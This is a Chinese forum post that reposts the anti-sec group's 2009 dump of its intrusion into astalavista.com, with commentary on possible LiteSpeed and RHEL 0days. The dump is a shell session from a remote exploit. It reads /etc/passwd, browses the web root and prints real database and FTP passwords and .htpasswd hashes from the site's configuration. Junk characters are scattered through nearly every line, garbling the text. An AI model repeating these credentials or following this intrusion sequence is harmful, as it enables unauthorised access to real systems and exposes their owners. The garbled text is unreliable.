里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
' Y" ?2 ^7 Z4 }
) F, r% ]6 R; u8 ?& p @[root@front3 ~]# curl -I litespeedtech.com
) J X' Z @8 f" Q% F ]HTTP/1.1 200 OK
0 f9 _' ?1 L" ODate: Fri, 05 Jun 2009 22:54:51 GMT* p; V+ o$ K9 E' |: ^+ E9 @; D- f
Server: LiteSpeed
6 F) u8 w% k0 T; q. H+ ^% u* ]) e+ N
& O6 ]& C% r% q/ \( ?另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-1 d* e6 ~& t& Y. O$ V- H# s3 {; D* z
& @/ W. V" S! b( V/ d+ r有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
6 p8 E: n6 S* i" \* ^! \3 Z1 h- d' c5 c& y( ^7 x% E
; V2 s! {3 Z0 A8 \/ p4 a
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
4 A$ J$ Q6 Z; Z' H0 o. R! X, k! k7 V/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
0 ~3 { o' W2 O z7 i* I d5 |/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
& _. Y7 Q4 G/ |4 ^; m- l\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /( m3 v% a: p6 M$ E4 C* d
\/ \/ \/ \/ \/ \/ \/' M z. O6 a" ]7 N- X
The Hacking & Security Community
+ }" h% S! j, i6 V, w[+] Founded in 1997 by a hacker computer enthusiast
/ N$ |! K A, f6 a[-] Exposed in 2009 by anti-sec group# [( N7 u, H1 d; c6 c- F+ k- W
" @" D: q' K2 q& X; Q. F8 R( o9 M
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:) t1 `) m' | [' R8 k
>> 03. Who’s behind the site?
& t' J* ?4 |5 A6 D2 ]: l$ t5 Z>>
" _$ a: N: n2 U8 N>> A team of security and IT professionals, and a countless number of contributors from all over the world.
! s2 d+ g& I* h- |- t
. C$ K- _6 w" L0 s& j5 i>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
) c$ ]2 I3 }" S1 |! L$ P>>5 \, G) R/ \* U: j) c8 g# f
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and y) ~% }# `# |
military institutions.
; t2 d# h0 x- l+ J" G' _8 q$ R4 n7 r9 M>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.. d: ^! Y- k5 ]- T: @! |
6 r6 w5 _4 j- I8 x9 R" w% ~5 m* o# T: |
Why has Astalavista been targeted?
( J8 M2 N# C! w/ B+ T" Q# ^8 k( r$ T8 |) Z% T \$ g! e( l& H
Other than the fact that they are not doing any of this for the “community” but
: N( l+ w8 `1 w7 t: n! [0 dfor the money, they spread exploits for kids, claim to be a security community5 b) U, m. W3 R/ Y' I, }
(with no real sense of security on their own servers), and they charge you $6.668 T; s& M/ s3 V! g' v
per months to access a dead forum with a directory filled with public releases
: O: d7 L! K3 I& e$ e0 s% pand outdated / broken services.7 t" {& F% o+ x; D! z# E
# {5 @5 q! n3 qWe wanted to see how good that “team of security and IT professionals” really is.
) g8 B! w$ t4 P; N, v8 A) `5 Y1 O; r
Let’s begin.
8 o* e/ O# _( P& d( ~( z0 A# d" `3 K0 R+ {. {" h j
anti-sec:~# ./g0tshell astalavista.com -p 80
% H- H, b \2 f7 G[+] Connecting to astalavista.com:80
) P! A5 ^; q' ~4 x( m/ d8 q[+] Grabbing banner…$ ^9 t* {0 {& _3 r
LiteSpeed6 v3 g% q7 a1 n9 |$ H! h2 T5 y
[+] Injecting shellcode…3 r7 ~* X( {# A
[-] Wait for it
# H4 r6 D* }5 i$ k3 {
4 X' [+ T0 b$ e[~] We g0tshell/ X4 c; ^ l! a. l4 n3 w, r; B
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux# w, e. H: Q) i
ID: uid=100(apache) gid=500(apache) groups=500(apache)- D) |% K" `0 B* Z
' \0 B4 s6 d7 Y! Y8 [sh-3.2$ cat /etc/passwd
g$ g3 }9 l9 n% A6 F2 froot:x:0:0:root:/root:/bin/bash
4 H( ]' \3 d& y' D8 {5 I6 sbin:x:1:1:bin:/bin:/sbin/nologin" z4 N |2 j4 ~
daemon:x:2:2:daemon:/sbin:/sbin/nologin
4 u( p6 `( F/ z& B# i7 J. badm:x:3:4:adm:/var/adm:/sbin/nologin
* M" ?7 }+ l$ t. V- ~9 K5 f$ glp:x:4:7:lp:/var/spool/lpd:/sbin/nologin6 Y6 ^; p4 `4 _# R" C( O
sync:x:5:0:sync:/sbin:/bin/sync
& c! b/ W: D4 j/ c' Xshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
5 K2 Q- g; z! X1 Zhalt:x:7:0:halt:/sbin:/sbin/halt5 a* h& x/ y/ F* k* k; k
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin# R) n7 Z* O" _1 |$ r0 @9 Q- z
news:x:9:13:news:/etc/news:
7 d3 M. D: A% l! g* |9 R4 _uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin) l# @' w3 \; F) }, k% p( b
operator:x:11:0 perator:/root:/sbin/nologin
" c* m9 G9 i- V/ ~1 E* f* ?4 \7 Ogames:x:12:100:games:/usr/games:/sbin/nologin
" y2 C' c7 I1 o K- fgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
' } F* a2 V( _ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
c- s( e4 M; y: Z) v/ Inobody:x:99:99:Nobody:/:/sbin/nologin9 E$ T$ Y* y( x* a
rpm:x:37:37::/var/lib/rpm:/sbin/nologin J7 z5 J3 B8 ~ t$ i2 _
dbus:x:81:81:System message bus:/:/sbin/nologin2 f; r, x6 t. q9 }1 v0 O
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin' C' O8 Z8 g7 z- x" B7 S& l/ @& \& W' n
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin0 |2 n. M7 t9 ^# m
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
7 O2 \! s, u; v9 n* D# r" bvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
' X9 d* t5 @* @7 g ]haldaemon:x:68:68:HAL daemon:/:/sbin/nologin7 g5 j& w& e( P; A, I6 Y+ d& V
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin: b/ S5 p G/ `$ V) a7 u. Z
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin, Z1 J/ ~' k% B1 b; v' A5 {, l' |7 b
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin5 N0 K. B# e8 X
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
: F' H% l% F+ ]. L* x# q& _: B% ?pcap:x:77:77::/var/arpwatch:/sbin/nologin# C! [8 ?+ q0 G- L* d5 P9 x
named:x:25:25:Named:/var/named:/sbin/nologin
/ E3 q8 M: n+ \1 b. l$ b/ a7 `3 Wapache:x:100:500::/var/www:/bin/false
- M0 P: q4 p9 m- r1 R" h$ bdiradmin:x:101:101::/usr/local/directadmin:/bin/bash/ w3 t$ y% p8 i; f- x- D! A
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
) s2 X q, U B2 |( c' `webapps:x:500:501::/var/www/html:/bin/bash
7 k( i. y0 y& `0 e# C3 j! ^) omajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash6 j3 ]/ P$ d" @1 [4 N' Y
admin:x:501:502::/home/admin:/bin/bash$ e8 V% T' l) I$ v
jon:x:502:503::/home/jon:/bin/bash# Y2 A0 ?6 b5 b; l
com:x:503:504::/home/com:/bin/bash. k/ j$ R4 u; s* X0 C
ntp:x:38:38::/etc/ntp:/sbin/nologin3 a9 ^/ r/ ~- I% C, x- J
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
. b( ^8 C! E' n% h3 d$ Vastanet:x:504:505::/home/astanet:/bin/bash
6 E8 Z( j$ y' I: j* ^avahi:x:70:70:Avahi daemon:/:/sbin/nologin/ p* q+ c. T) v4 h3 O" f8 \( A
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin2 ?$ B9 A( }5 C/ O
9 g# ]# a! H {+ i' ]7 `
sh-3.2$ cat /etc/hosts: n: T/ R( _, y
# Do not remove the following line, or various programs
. T6 o) x1 C4 @- T' v3 {1 k# that require network functionality will fail.! T7 a( v; Y2 R/ K/ x8 C* q
127.0.0.1 localhost.localdomain localhost
/ q' _6 L4 p) d s::1 localhost6.localdomain6 localhost6. ? ^! H% T0 E8 C& w# a
80.74.154.172 asta1.astalavistaserver.com6 e/ f# }* D' I1 \
, _9 h( e8 U- V1 S; G- x+ W) O
sh-3.2$ pwd; }# ^& R4 A' M3 j2 Q9 H+ S1 Y4 L. ?" D
/home/com/public_html
- v0 i" Q3 x( D' C& M; ~7 W- o
" x& D1 X% s* N* }; |2 e( i/ gsh-3.2$ ls -la. `% n2 T# x4 L) R# W: [) ]4 @
total 18460
8 X" N# k1 O% p2 {! d- r2 Udrwxr-xr-x 30 com apache 4096 May 28 17:06 .1 U: }4 Y# k- a4 @) s0 t
drwx–x–x 11 com com 4096 Jun 25 2008 ..( O5 s8 l9 c) O. m" n1 C
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin: f" w* O; Z3 W' Y
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache, e2 e% g+ N/ y- D; \9 o/ V
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
' R0 _1 j4 n$ D/ Udrwxrwxrwx 2 com com 4096 May 19 00:50 config" \; h7 o) S4 P& }, f
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core( g" V% Q$ M' n/ v ^* R
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
4 s/ \; X( a( l& X6 {drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
& Z' c4 M; \. y1 ~7 f$ \drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
, M! m6 W- E' c/ z/ p3 wdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
+ k& J" T2 x9 r* T2 I9 y) Y) s-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php2 @) _$ i, q6 o* P w( ? T B% \2 |
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
2 v1 M( Z; I1 J* y4 vdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor9 x/ X7 J4 K/ m" C7 S7 X
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
# O) `$ m1 l& ^0 b( ldrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed% y* c* Q/ r: t& g3 [ B
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess! F' C: m7 s, j; }( z. |3 v
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
) Z2 k- ^ F5 L: n, p. l# |6 y-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak- e' P0 N" ^. A" F- U( Z# M4 j" o
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool N x; |) ~- d8 G
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images5 a! q5 f" b0 U2 F9 v5 {
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php6 ~8 b' T$ `( y9 o/ s5 }
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
* _& F' l+ m$ G% fdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang& c% H I6 E" S0 q5 B9 G% C. x
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
' {+ T! A7 W- ?0 \, }8 `7 Cdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
* [! q. u4 c0 k4 W9 w& W, k( Ldrwxr-xr-x 8 com com 4096 May 11 12:48 modifications* o7 y/ S3 r+ V) L' O3 o
drwxr-xr-x 34 com com 4096 May 28 16:30 modules) T/ r8 d2 q5 i5 j# i+ m
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin* S F! P5 r- A# O" }
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
X" J, f4 V* I5 g r. Wdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old0 `# o7 { o5 _* P" Q; V
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy- G1 T3 k& H, L1 ~6 Q% _8 o9 S/ T
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy! ~; l& |& ~( s' J
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt" {4 r2 P! b& P, @5 V# g& ^
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
5 i* L3 g" L0 k1 b8 R: z-rw-r–r– 1 com com 223 Mar 30 15:32 test.php; I( {) J0 k' r
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
" X, I2 A) ^1 a4 ]: Ndrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp3 h( B" s7 l1 V0 N: ^4 C
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam! w5 h# \8 i7 @2 _; q
5 \8 _8 F$ `( ~( u
sh-3.2$ head -20 index.php* q/ D* {3 f% J
<?php
/ n# N. r B! f9 O. z1 l" g) X% j' U6 S" [8 k5 j- F
/**
6 \- W1 L4 ~# Q9 M. b" D* The main page for the CMS
2 y3 H( I) u' u+ ?: O) I$ q* @copyright CONTREXX CMS - COMVATION AG! C' [" J7 o+ l, X
* @author Comvation Development Team# J6 B9 V2 a: T
* @version v1.0.9.10.1 stable
) Z# S r) s7 C8 C, i. N: R* @package contrexx3 F, L, u) N. N. k: |
* @subpackage core
7 \( Z, c! t/ c8 C0 W/ \/ ~1 M* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage$ I: Z$ |; Z8 Q
* @since v0.0.0.0' b2 b+ e4 t- J+ u5 x
* @todo Capitalize all class names in project: g2 _; U# s+ J$ B2 f* s! z' p( ~
* @uses /config/configuration.php1 t; F5 ^5 [6 ]6 @5 |! `; }+ E
* @uses /config/settings.php
; Z+ @" b% r C% E+ v* @uses /config/version.php
4 J1 o. v: O- h2 `$ y1 p$ N* @uses /core/API.php
: S: y. x0 {6 T$ Z* @uses /core_modules/cache/index.class.php% w9 W6 k4 Q. k J+ ] o; c0 p z
* @uses /core/error.class.php
; U! r9 D7 Y+ I3 e* @uses /core_modules/banner/index.class.php
' L7 \, C. ~- ]6 Z& M* @uses /core_modules/contact/index.class.php) f I+ f& e& {6 n
6 K# s; R2 Z& C9 k- Fsh-3.2$ cd config/ O9 J7 W/ y; f; u
sh-3.2$ ls -la
% f) W! @6 k! L d/ ?# f+ b: d6 Rtotal 32
" n' z" j, M" [' N5 C# A+ k& b# ]drwxrwxrwx 2 com com 4096 May 19 00:50 .: z1 g+ g; c$ z! |' R) l6 F( ~; k
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..5 Q' e* l3 e X' y+ X9 ^
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php7 j9 ~, \ |0 @# W
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
4 i+ q# k$ m1 |5 f-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
9 \. U$ j3 _8 b0 Z/ Z5 q-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php* K0 k" ^4 m" v7 V+ `! [
5 \" F; i0 Y5 O3 h( X3 Esh-3.2$ cat configuration.php
$ m$ H7 X) x3 K( b; X, y7 \, b% @, L[snip]
' d9 v( H( ^, {+ Y$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost/ C0 Y% }4 Q6 L& a, m: a
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
H; C x+ \6 ^8 M7 R$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
! Z% j2 i0 U9 y, T" I$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
% Q" [; j5 w" L) e ~$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password( j* e( s: J7 l+ w, [
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)1 O; N* _5 R2 _$ U
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
8 L1 A, v! f' Y0 @! t* i' I# R[snip]
1 S# d$ T& Q$ I8 T D6 C$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
6 R" ^4 Y$ Z- t+ m4 n& x8 H! D$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode3 {+ b% t+ X# ^% L
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost+ @: @- Z3 X! K7 l
$_FTPCONFIG['port'] = 21; // Ftp remote port0 O& _# a% `8 N, T6 x# I, S( T
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
, l) P9 F, x+ K' I n- d' P2 X* H$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password2 s6 O7 h6 I0 H7 [3 O7 t. v+ j
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
" y+ b# _/ F# a6 d* I8 t4 M
4 l q& b( S( {, k5 ^* u8 Ssh-3.2$ cd ..
. }. V. I0 [0 U* A: Xsh-3.2$ cd dvd/) [0 | O- U) v5 l7 x* ^
sh-3.2$ ls -la
2 ?- r8 h, J' `3 Jtotal 29137801 Z$ Y- }) [( g) B
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
1 D9 |: f/ Q) k7 u3 bdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..6 ~; D8 n5 d# T8 y
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
* h& p" { ~# G$ Y9 Q-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar$ S2 v% o! u4 X9 P# h; {8 y
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
7 k& U2 I, j" x9 k-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess+ `, w7 Y6 A, C' [
K2 _7 b# m T7 T$ p+ m9 nsh-3.2$ cat .htaccess
; M1 |2 Y; R. `; z0 w% b7 KauthType Basic1 v1 F7 S6 B* \5 @# b, U5 ^
authName DVD# ] y. W" N9 Y: ?+ l1 X; A
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
. I- M* E0 W9 W5 i; S; arequire valid-user2 U, k/ o& O! \: [6 b$ ?
- b9 z1 Y! X$ m$ u4 @$ U; C
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
. l2 m" J0 _- e# J- `) |! x+ yDVDdownload:CRD8cuY6.MPT6
6 j9 O- y( O# D1 D* O" f0 {; zDVDdownload2:CR8a36.wluFMg- k+ `4 G0 m0 \" u7 y& G4 N9 l0 h3 Z
! a( ?( j$ }/ U( f. L9 V) dsh-3.2$ cat test.php1 I. ^% `% Y- Z( M1 w
<?php. A$ R! }" i! H) i) E6 Q
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;) Q- K! R B7 z. @' b4 j
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
" T. i! d8 S0 U* @2 K0 p, N: wecho $url;
. u H# i. d; K k?>$ }. j F) \, @$ p
7 m3 {( {* f7 U. t1 J7 s$ c) u- w
sh-3.2$ cd modifications/0 y) T T. d/ f/ N1 n9 q
sh-3.2$ ls -la; G3 p0 E9 B6 V& | I3 G
total 32
' R- m" s( f6 d3 m/ s5 f# [/ w! Edrwxr-xr-x 8 com com 4096 May 11 12:48 .
4 @/ f8 L, D$ k9 `3 Vdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
$ {1 J: I* x9 D' G; w% cdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
/ w) L1 p! ^9 r% mdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
: N6 f: p8 t4 _9 f* ]/ Q: zdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools. C! y( T M0 I* D: g" n
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc! B7 t* L& z& ?( i9 o
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search9 d/ w! q4 \1 Q& h# m' V
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
* T, h! j% h6 K2 k; z
3 ^8 B: m: I9 x# D: l# R# C+ u% osh-3.2$ ls -R
) [1 j- J) j9 I7 h.:
@, R- N' E& S& i. [com_avtng cronjobs onlinetools pjirc search _tmp
$ d0 X4 K5 e$ w; v6 i/ |$ i$ I! B0 x6 r0 p2 j
./com_avtng:1 o8 W! k4 {' d8 n, H
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts3 q+ e9 I" k( n
, K/ a9 _1 U6 M2 E3 ~) ^% m8 i
./com_avtng/scripts:
2 y2 O6 e. y( a e* w/ R$ ~popunder.js& [4 G) P" n! q7 N
+ ?, j. c' N3 l3 {./cronjobs:1 d0 Z! R1 o+ ]6 @ m! G* x
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp# H2 j. K( e* C+ n
1 S1 U0 ^- a5 J0 q* l/ m9 y a
./cronjobs/tmp:
6 o8 b7 W e' x5 S1 X, i1 zcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
1 n4 l/ m, @7 e7 d! E- z g5 O5 W' t
./onlinetools:0 t' B1 b" f3 c6 n
index.php5 P2 z% h1 ~8 h1 x7 B! d, F
3 R2 ~) ]' i9 {3 j T! k
./pjirc:
' @- o' D3 K& R: B: i# {- J* xa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
& O+ E! l' \& M AAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
( N% ~+ l$ l4 b6 {7 n1 xbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
( D: m: F' F! w3 e
& m* ]7 \8 T' B! ^% L./pjirc/img:1 w: I* N# L; P; f& ]
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif8 o( E# \% y# r) k
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 9 O. E- P b7 G `
verre-eau.gif
2 G5 ^$ p! C) }. Hargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif / h9 C7 U) c( o; V! D
verre-vin.gif7 \) c5 R- K# ~9 A
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif9 ?2 B/ |5 ]# e
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif$ A z: k& E d9 Z
$ o, ~4 D4 f# p& K3 P5 C./pjirc/snd:1 G& k& i0 r: \% i5 y3 @
bell2.au ding.au
! g3 j- N* @# z& m5 Z& J; `. K
$ [0 U( y+ {( }2 i( s# X( y./search:4 H, A& K+ L' f" f1 u& O
searchEngines.php search.php
* {/ Z4 X& [, K; c" k6 y9 a7 n* |; S
./_tmp:9 k" \, V+ a9 ^1 q
defaultPorts.php defaultPorts.txt. q( L( B' Z% Q. m1 |5 Q" Q6 P
) P/ C% h! c2 ^& U' h, A" x2 z
sh-3.2$ cd cronjobs// c0 O2 a0 V7 ~5 v% h' T
sh-3.2$ cat exploits.php
1 Y9 O4 [, A. a$ [ E/ L[snip]+ ?5 P# G4 Q( S! ~- d
$categories = array();
* N% ^; C) n" a6 n P9 O9 O8 z, A7 t$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;) _) }+ Q6 I+ U4 m5 V+ W7 e
$expolits = file($milw0rmFile);
4 ~0 d" S0 W- Y7 V8 Q$comExploits = array();5 K3 b6 @2 l( h) v$ Q, Y9 C- U% l
[snip]: ^+ H' c5 h2 R) E- N: O
// manage data
0 M) J! d, e( Q2 g" w- c4 zfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
|5 i" f1 j7 u0 n$ A. x- H$ P$ m4 c7 n( U) B
// get path and title3 O. `! r. U3 F
$expolits[$x] = trim($expolits[$x]);, n2 \) E$ I; {# g
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
\+ M3 ?. j$ l) W: @0 m $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
* R. S) j- v$ l$ }* @! q0 r/ y+ P1 e+ _5 E/ J: E
// check if file exists
- D) B; S# i1 O- ~. Z t6 v; Q if (file_exists($path)) {+ W% d6 c" o4 h$ {4 A8 l
2 p, a! @; l$ C5 m) k $text = file_get_contents($path);
@8 @" u9 p/ D- O
9 a) I# s0 a# s. h! b // get content and date
/ J4 {! L5 G5 K( P8 ^ //$text = htmlspecialchars($text, ENT_QUOTES);
7 ?7 ^% T8 K/ a4 q! \8 A $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
! e7 u T1 j. ?" X3 {, z if ($tmptext != ”) {, P6 }9 T" F# Y
$text = $tmptext;
8 P- S: y+ a3 {8 Q7 c1 R0 p } else {1 Q% t7 b4 N, b' T! c9 S% ^- \
$text = addslashes(htmlentities($text, ENT_QUOTES));, s9 _1 W9 \! c$ _, c, E& B/ Y
}* Y( e$ _- t1 i+ c% `4 D2 h8 y
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
6 O1 b: R! w$ `/ [+ A0 E" ^ $tmp = explode('-', $date);
, F9 d' S4 h- F: W; r $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
% f$ ^5 z' `+ Y $cat = getCategory ($path);
' [4 t/ d! C0 H $ext = pathinfo(basename($path));; W/ P% v4 z' |
$ext = $ext['extension'];
2 X& c7 a7 _1 v+ J0 J3 j2 d( H $qStr = ”% V. G1 E8 V& U% `9 D2 M
SELECT `id`6 A2 M( J, J% Q. E& x
FROM `contrexx_module_exploits`. n4 l/ D" p- \
WHERE `title` = ‘” . $title . “‘
z: B# }4 P* I AND `date` = ‘” . $date . “‘/ e# _# i; e% L! h, W
“;/ X8 @, X' E2 o
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;% W4 Y. H5 z! b g% Z- w0 D: e+ z
$q = $_objDB->query($qStr);
j. P6 M. b: V0 r _6 _5 U' h" E0 t5 t1 c1 \6 o+ k* N
if ($q->numRows() == 0) {
+ T1 g* Z0 T, V3 I7 u. U1 P! U9 F+ Y+ p' \6 h0 K, B" S
// prepare array
" W0 B' W# R+ d& v" A) m7 z $comExploits[$x]['date'] = $date;
( U4 b' `' S$ Y+ }8 O $comExploits[$x]['title'] = $title;
( L+ P% _5 I4 ^& L m. ?8 _ $comExploits[$x]['author'] = ‘milw0rm’;
0 w/ X3 e7 j2 e% A/ j5 ?& Q $comExploits[$x]['text'] = $text;
" S7 t; T: ], s) K V8 `0 D $comExploits[$x]['source'] = $ext;, e- n& Y6 F8 B# G9 S$ r( A5 o6 D
$comExploits[$x]['url1'] = ”;* B. i1 p' M0 [, u b% f
$comExploits[$x]['url2'] = ”;
9 h: G+ K8 X: [$ |$ `+ y $comExploits[$x]['catid'] = $cat;
0 s& s, ^4 @4 [( a( J" N. z; m f3 e $comExploits[$x]['lang'] = ‘2′;
0 B8 t* i% X2 a! ]+ w7 Z6 S7 d $comExploits[$x]['userid'] = ‘12′;: y, X1 F& n. P8 _
$comExploits[$x]['startdate'] = ‘0000-00-00′;- w; q3 [' E$ y' J
$comExploits[$x]['enddate'] = ‘0000-00-00′;0 e$ a; q5 r1 F+ u, R* q
$comExploits[$x]['status'] = ‘1′;
- y2 a( _/ D) j) } R& q! T; r $comExploits[$x]['changelog'] = $date;# ~. U# @8 ]( H: Y
) Z* W+ m8 T; F E( S; v& b8 C
}
7 u; n8 z* [& v8 U: f6 E[snip]: O7 U! w# ^" c
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
) R+ ~# v c0 M0 S+ i/ A) f<rss version=”2.0″>$ |7 U }, x( `/ e7 x }
